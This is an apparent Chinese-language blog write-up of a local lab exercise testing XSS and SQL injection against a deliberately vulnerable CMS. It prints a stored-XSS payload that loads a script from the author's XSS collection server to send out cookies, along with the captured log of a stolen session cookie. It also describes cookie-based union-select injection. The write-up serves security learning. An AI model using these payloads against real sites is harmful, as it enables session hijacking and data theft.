首页 > 技术文章 > xss和sql注入学习1

taurusfy 2017-10-30 16:47 原文

在本地搭建一个存在漏洞的网站,验证xss漏洞和SQL注入的利用方法。

使用phpStudy工具搭建一个美食CMS网站平台。

 

0x01  xss测试

打开调试模式,定位姓名栏输入框:

尝试在value中插入xss攻击代码:

123"><script>alert(document.cookie);</script></td><td>

点击更新,成功弹出该网站登录后的cookie信息。说明这个输入框没有对<script>标签进行过滤。

如果希望将这个cookie发到自己的xss平台,可以构造如下输入:

" /></td><script src=\"http://127.0.0.1:9999/static/get.js\"></script><td>

http://127.0.0.1:9999/static/get.js为本地xss平台中获取cookie等信息的代码。

可以在本地看到如下信息:包括cookie,user_agent,ipaddress等信息。

id: 2J1h
location: http://www.xdcms.com/index.php?m=member&f=edit
toplocation: http://www.xdcms.com/index.php?m=member&f=edit
cookie: PHPSESSID=7urapqfnc9cchs31lfu38u0pi4; member_user=xdcms; member_userid=3
opener:
http_user_agent Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
http_addr 127.0.0.1
[30/Oct/2017 16:04:36] "GET /?do=api&id=2J1h&location=http%3A//www.xdcms.com/index.php%3Fm%3Dmember%26f%3Dedit&toplocation=http%3A//www.xdcms.com/index.php%3Fm%3Dmember%26f%3Dedit&cookie=PHPSESSID%3D7urapqfnc9cchs31lfu38u0pi4%3B%20member_user%3Dxdcms%
3B%20member_userid%3D3&opener= HTTP/1.1" 200 3

 

查看后台数据库,发现该段代码被写入了数据库,不知道是否算存储型xss???总之,这样每次刷新页面时,都会向xss平台发送cookie信息。

 

0x02 sql注入测试

走读后台php的代码,发现该输入界面与mysql的交互语句:

输入参数$userid来自cookie的member_userid参数,因此这里采用cookie注入的方法。

下载一个cookie修改插件,修改member_userid

 

 

member_userid=1的时候,姓名为test,可见可以通过修改这个cookie值读取数据库。

使用union select尝试获取更多数据库信息。

测试发现member_userid=4的时候,姓名电话为空,说明数据库只有3条记录;

union select 1,2,……时,出现如下报错:

 

have a different number of columns,说明union select的列数与表的列数不相等,尝试发现到15的时候才不出现报错:

从该显示可以看出,用户名,手机号码,姓名,安全邮箱,联系地址分别为表的第3,13,12,15,14列。可以在这些地方输出数据库信息。

 

推荐阅读